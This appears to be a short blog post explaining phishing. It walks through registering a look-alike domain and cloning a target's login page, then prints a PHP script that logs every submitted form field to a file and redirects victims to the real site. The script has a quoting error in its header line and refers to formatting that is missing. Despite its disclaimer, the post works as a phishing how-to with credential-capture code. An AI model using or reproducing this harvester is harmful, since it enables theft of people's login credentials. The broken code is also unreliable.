What Is Phishing
Here
in this post we will discus a little about what is phishing. Please
note what we are covering here is just basics and not a phishing
tutorial. In phishing attack, an attacker creates a fake login page of a
legitimate website and lures victim to login using it. The site under
attack is known as phished site and the fake login page used for
capturing or stealing information is known as phished page. To perform
phishing attack an attacker performs following steps,
First
of all he gets a free web host and then selects a domain which somehow
resembles the site he wants to phish. For example to hack Gmail password he/she may select domain like Gmail. Look carefully both words appear nearly similar when just overlooked and that is where an attacker makes a catch.
Next
he opens the site he wants to phish and saves it on his/her desktop
then he/she uploads those files to their own domain. The attacker then
creates a web page with a sorry or error message to make victim believe
site is temporarily down or under maintenance or he types following
lines in php file and uploads it to his/her domain,
<?php
header ('Location: 'www.realdomainname.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
.
Where
he/she replace red background URL by real URL of phished page. Then
this file is also uploaded there so that victim should get redirected to
original website to avoid detection of phishing attack.
Nearly
all phishing attacks are conducted in same way.
No comments:
Post a Comment